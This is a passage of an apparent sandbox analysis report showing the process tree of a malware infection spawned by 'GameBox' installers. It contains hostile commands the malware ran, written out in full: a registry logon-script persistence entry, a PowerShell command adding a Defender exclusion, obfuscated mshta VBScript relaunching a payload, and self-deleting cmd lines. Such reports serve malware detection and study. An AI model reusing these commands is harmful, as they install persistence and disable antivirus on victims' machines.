                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 1060
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:5036
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 1104
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:5672
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 1168
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:6268
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 1028
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:5236
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 1452
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:6000
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5620 -s 1428
                                                                      4⤵
                                                                      • Program crash
                                                                      PID:7372
                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    PID:5668
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-HOCGG.tmp\Inlog.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-HOCGG.tmp\Inlog.tmp" /SL5="$10398,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Suspicious use of FindShellTrayWindow
                                                                      PID:5936
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-H1E94.tmp\Setup.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-H1E94.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                        5⤵
                                                                          PID:6984
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-70RIU.tmp\Setup.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-70RIU.tmp\Setup.tmp" /SL5="$4023C,17361401,721408,C:\Users\Admin\AppData\Local\Temp\is-H1E94.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                            6⤵
                                                                            • Loads dropped DLL
                                                                            • Drops file in Program Files directory
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            PID:7112
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-7OQ9M.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                              7⤵
                                                                                PID:6380
                                                                                • C:\Windows\SysWOW64\expand.exe
                                                                                  expand C:\Users\Admin\AppData\Local\Temp\is-7OQ9M.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                  8⤵
                                                                                  • Drops file in Windows directory
                                                                                  PID:6188
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                7⤵
                                                                                  PID:8360
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                    8⤵
                                                                                      PID:8724
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-7OQ9M.tmp\{app}\vdi_compiler.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-7OQ9M.tmp\{app}\vdi_compiler"
                                                                                    7⤵
                                                                                      PID:8680
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-7OQ9M.tmp\{app}\vdi_compiler.exe"
                                                                                        8⤵
                                                                                          PID:2304
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping localhost -n 4
                                                                                            9⤵
                                                                                            • Runs ping.exe
                                                                                            PID:7484
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                        7⤵
                                                                                          PID:1528
                                                                                        • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                          "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                          7⤵
                                                                                            PID:2972
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                    3⤵
                                                                                      PID:5756
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-14DSG.tmp\WEATHER Manager.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-14DSG.tmp\WEATHER Manager.tmp" /SL5="$103A8,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                        PID:6016
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-SIPRQ.tmp\Setup.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-SIPRQ.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Enumerates connected drives
                                                                                          • Modifies system certificate store
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:3380
                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-SIPRQ.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-SIPRQ.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629372057 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                            6⤵
                                                                                              PID:8780
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        • Drops file in Program Files directory
                                                                                        PID:5852
                                                                                      • C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe
                                                                                        "C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:5916
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                          4⤵
                                                                                            PID:6516
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f /im chrome.exe
                                                                                              5⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:6732
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6112
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4504
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5180
                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                            C:\Windows\system32\WerFault.exe -u -p 5180 -s 1496
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            PID:4684
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6024
                                                                                          • C:\Users\Admin\AppData\Roaming\4940284.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\4940284.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5280
                                                                                          • C:\Users\Admin\AppData\Roaming\5472983.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\5472983.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                            PID:4160
                                                                                          • C:\Users\Admin\AppData\Roaming\4303800.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\4303800.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2872
                                                                                          • C:\Users\Admin\AppData\Roaming\2882101.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\2882101.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4116
                                                                                          • C:\Users\Admin\AppData\Roaming\2855685.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\2855685.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:652
                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
                                                                                          3⤵
                                                                                            PID:5968
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5792
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Enumerates connected drives
                                                                                            • Modifies system certificate store
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:5708
                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629372057 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                              4⤵
                                                                                              • Enumerates connected drives
                                                                                              PID:7772
                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            • Checks computer location settings
                                                                                            PID:6032
                                                                                            • C:\Users\Admin\Documents\qzsHB6i05FlCtqG1AJ3Segrv.exe
                                                                                              "C:\Users\Admin\Documents\qzsHB6i05FlCtqG1AJ3Segrv.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:6836
                                                                                            • C:\Users\Admin\Documents\xYEMydlGeFv0BsVYg2o9B5ky.exe
                                                                                              "C:\Users\Admin\Documents\xYEMydlGeFv0BsVYg2o9B5ky.exe"
                                                                                              4⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:6824
                                                                                            • C:\Users\Admin\Documents\knenT15Pk1zisVfVnRNi2JLI.exe
                                                                                              "C:\Users\Admin\Documents\knenT15Pk1zisVfVnRNi2JLI.exe"
                                                                                              4⤵
                                                                                                PID:7140
                                                                                              • C:\Users\Admin\Documents\xVPyyeSksdK0nxeFRO573K69.exe
                                                                                                "C:\Users\Admin\Documents\xVPyyeSksdK0nxeFRO573K69.exe"
                                                                                                4⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:6212
                                                                                                • C:\Users\Admin\Documents\xVPyyeSksdK0nxeFRO573K69.exe
                                                                                                  C:\Users\Admin\Documents\xVPyyeSksdK0nxeFRO573K69.exe
                                                                                                  5⤵
                                                                                                    PID:4484
                                                                                                • C:\Users\Admin\Documents\3NSNjq3lvkyml08imiSSopkO.exe
                                                                                                  "C:\Users\Admin\Documents\3NSNjq3lvkyml08imiSSopkO.exe"
                                                                                                  4⤵
                                                                                                    PID:6372
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-DGAUL.tmp\3NSNjq3lvkyml08imiSSopkO.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-DGAUL.tmp\3NSNjq3lvkyml08imiSSopkO.tmp" /SL5="$203A8,138429,56832,C:\Users\Admin\Documents\3NSNjq3lvkyml08imiSSopkO.exe"
                                                                                                      5⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:6544
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-SAHQM.tmp\Setup.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-SAHQM.tmp\Setup.exe" /Verysilent
                                                                                                        6⤵
                                                                                                          PID:7408
                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                            7⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Enumerates connected drives
                                                                                                            • Modifies system certificate store
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:7728
                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629372057 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                              8⤵
                                                                                                                PID:1628
                                                                                                      • C:\Users\Admin\Documents\CBdFm71KWgm93k9NaXJiu_l3.exe
                                                                                                        "C:\Users\Admin\Documents\CBdFm71KWgm93k9NaXJiu_l3.exe"
                                                                                                        4⤵
                                                                                                          PID:6276
                                                                                                          • C:\Users\Admin\Documents\CBdFm71KWgm93k9NaXJiu_l3.exe
                                                                                                            "C:\Users\Admin\Documents\CBdFm71KWgm93k9NaXJiu_l3.exe" -q
                                                                                                            5⤵
                                                                                                              PID:7036
                                                                                                          • C:\Users\Admin\Documents\oTcz5ctA9_PYdRfllPflEn6m.exe
                                                                                                            "C:\Users\Admin\Documents\oTcz5ctA9_PYdRfllPflEn6m.exe"
                                                                                                            4⤵
                                                                                                              PID:6256
                                                                                                              • C:\Users\Admin\AppData\Roaming\1247710.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\1247710.exe"
                                                                                                                5⤵
                                                                                                                  PID:5840
                                                                                                                • C:\Users\Admin\AppData\Roaming\5331655.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\5331655.exe"
                                                                                                                  5⤵
                                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4608
                                                                                                                • C:\Users\Admin\AppData\Roaming\2182283.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\2182283.exe"
                                                                                                                  5⤵
                                                                                                                    PID:2884
                                                                                                                  • C:\Users\Admin\AppData\Roaming\8149263.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\8149263.exe"
                                                                                                                    5⤵
                                                                                                                      PID:3292
                                                                                                                  • C:\Users\Admin\Documents\SjatVPudj3SNPnwndIqbBrtR.exe
                                                                                                                    "C:\Users\Admin\Documents\SjatVPudj3SNPnwndIqbBrtR.exe"
                                                                                                                    4⤵
                                                                                                                      PID:6964
                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\SJATVP~1.DLL,s C:\Users\Admin\DOCUME~1\SJATVP~1.EXE
                                                                                                                        5⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:8016
                                                                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\SJATVP~1.DLL,ejFJNQ==
                                                                                                                          6⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Checks processor information in registry
                                                                                                                          PID:9112
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\SJATVP~1.DLL
                                                                                                                            7⤵
                                                                                                                              PID:7600
                                                                                                                      • C:\Users\Admin\Documents\yvdNzgM6WFnpq8Ygxh1204kX.exe
                                                                                                                        "C:\Users\Admin\Documents\yvdNzgM6WFnpq8Ygxh1204kX.exe"
                                                                                                                        4⤵
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:5844
                                                                                                                      • C:\Users\Admin\Documents\gDAKiSFkw0aKo7SESUIoswi7.exe
                                                                                                                        "C:\Users\Admin\Documents\gDAKiSFkw0aKo7SESUIoswi7.exe"
                                                                                                                        4⤵
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:5528
                                                                                                                      • C:\Users\Admin\Documents\07AN_CIHvEx0oz6aFwRhXcWw.exe
                                                                                                                        "C:\Users\Admin\Documents\07AN_CIHvEx0oz6aFwRhXcWw.exe"
                                                                                                                        4⤵
                                                                                                                          PID:3320
                                                                                                                          • C:\Users\Admin\Documents\07AN_CIHvEx0oz6aFwRhXcWw.exe
                                                                                                                            "C:\Users\Admin\Documents\07AN_CIHvEx0oz6aFwRhXcWw.exe"
                                                                                                                            5⤵
                                                                                                                              PID:7396
                                                                                                                          • C:\Users\Admin\Documents\2yFADYlOzirCzayjeA_utLbH.exe
                                                                                                                            "C:\Users\Admin\Documents\2yFADYlOzirCzayjeA_utLbH.exe"
                                                                                                                            4⤵
                                                                                                                              PID:5728
                                                                                                                            • C:\Users\Admin\Documents\x0oH5szD2NtsaGmAxhBIPBj7.exe
                                                                                                                              "C:\Users\Admin\Documents\x0oH5szD2NtsaGmAxhBIPBj7.exe"
                                                                                                                              4⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              • Checks processor information in registry
                                                                                                                              PID:2208
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im x0oH5szD2NtsaGmAxhBIPBj7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\x0oH5szD2NtsaGmAxhBIPBj7.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                5⤵
                                                                                                                                  PID:8344
                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                    taskkill /im x0oH5szD2NtsaGmAxhBIPBj7.exe /f
                                                                                                                                    6⤵
                                                                                                                                    • Kills process with taskkill
                                                                                                                                    PID:8768
                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                    timeout /t 6
                                                                                                                                    6⤵
                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                    PID:6660
                                                                                                                              • C:\Users\Admin\Documents\6BnSCRM3K1FN6imKyAuN0ufB.exe
                                                                                                                                "C:\Users\Admin\Documents\6BnSCRM3K1FN6imKyAuN0ufB.exe"
                                                                                                                                4⤵
                                                                                                                                  PID:1360
                                                                                                                                • C:\Users\Admin\Documents\HrDX4JVglfll5gJRAX9FRU_G.exe
                                                                                                                                  "C:\Users\Admin\Documents\HrDX4JVglfll5gJRAX9FRU_G.exe"
                                                                                                                                  4⤵
                                                                                                                                    PID:6236
                                                                                                                                  • C:\Users\Admin\Documents\B8cqDtpGnE4A0NQrWe4MLRtq.exe
                                                                                                                                    "C:\Users\Admin\Documents\B8cqDtpGnE4A0NQrWe4MLRtq.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:4404
                                                                                                                                  • C:\Users\Admin\Documents\cwTrliuKIIexGOBlQemcUIaL.exe
                                                                                                                                    "C:\Users\Admin\Documents\cwTrliuKIIexGOBlQemcUIaL.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5756
                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                      "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\cwTrliuKIIexGOBlQemcUIaL.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\cwTrliuKIIexGOBlQemcUIaL.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                      5⤵
                                                                                                                                        PID:6660
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\cwTrliuKIIexGOBlQemcUIaL.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\cwTrliuKIIexGOBlQemcUIaL.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                          6⤵
                                                                                                                                            PID:7868
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                                              hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                                              7⤵
                                                                                                                                                PID:7248
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                  8⤵
                                                                                                                                                    PID:8032
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                      9⤵
                                                                                                                                                        PID:8224
                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                                      8⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:6784
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill -f -iM "cwTrliuKIIexGOBlQemcUIaL.exe"
                                                                                                                                                    7⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:7284
                                                                                                                                            • C:\Users\Admin\Documents\vYGGRV0SAWo4AadwnKPK5NvF.exe
                                                                                                                                              "C:\Users\Admin\Documents\vYGGRV0SAWo4AadwnKPK5NvF.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                              PID:6344
                                                                                                                                      • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                        C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:4816
                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                          2⤵
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          PID:5508
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                            3⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:5532
                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                          2⤵
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          PID:5116
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                            3⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:3696
                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                          2⤵
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          PID:9136
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                            3⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:9156
                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                          2⤵
                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                          PID:3228
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                            3⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:1828
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-AG2ET.tmp\VPN.tmp
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-AG2ET.tmp\VPN.tmp" /SL5="$2039C,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                        1⤵
                                                                                                                                          PID:6068
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-5U1MB.tmp\Setup.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-5U1MB.tmp\Setup.exe" /silent /subid=720
                                                                                                                                            2⤵
                                                                                                                                              PID:6416
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-F6NR3.tmp\Setup.tmp
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-F6NR3.tmp\Setup.tmp" /SL5="$4025C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-5U1MB.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                3⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                • Modifies system certificate store
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                PID:7096
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                  4⤵
                                                                                                                                                    PID:8256
                                                                                                                                                    • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
